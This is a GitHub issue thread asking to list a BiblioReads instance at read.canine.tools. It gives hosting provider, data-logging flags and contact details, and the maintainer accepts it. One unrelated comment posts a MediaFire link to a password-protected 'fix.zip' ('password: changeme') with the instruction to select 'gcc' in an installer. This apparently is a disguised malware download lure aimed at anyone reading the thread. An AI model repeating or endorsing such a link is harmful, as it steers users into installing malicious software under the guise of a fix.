### ISSUE TITLE
[Instance] read.canine.tools

### ISSUE THREAD

**Issue by hyperdefined** [nesaku/BiblioReads#24]
**What URL Is Your Instance Available At?**
https://read.canine.tools

**What Country Is Your Instance Being Hosted In?**
United States

**What Hosting Provider Is Used? (Input Your ISP's Name If You Are Self-Hosting)**
[RoyaleHosting](https://royalehosting.net/), ~~proxied via Cloudflare.~~

**Do You Collect Any User Data?**
I don't use tracking data, just only regular NGINX server logs. They are rotated.
```
NEXT_PUBLIC_INSTANCE_IP_DATA: "true"
NEXT_PUBLIC_INSTANCE_PAGE_VIEW_DATA: "true"
NEXT_PUBLIC_INSTANCE_DEVICE_TYPE_DATA: "false"
NEXT_PUBLIC_INSTANCE_DIAGNOSTIC_DATA: "true"
```

**Contact Details**
contact@hyper.lol
hyper@canine.tools

**Any Other Information?**
No

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nesaku** [comment]
Added! Thanks for hosting.
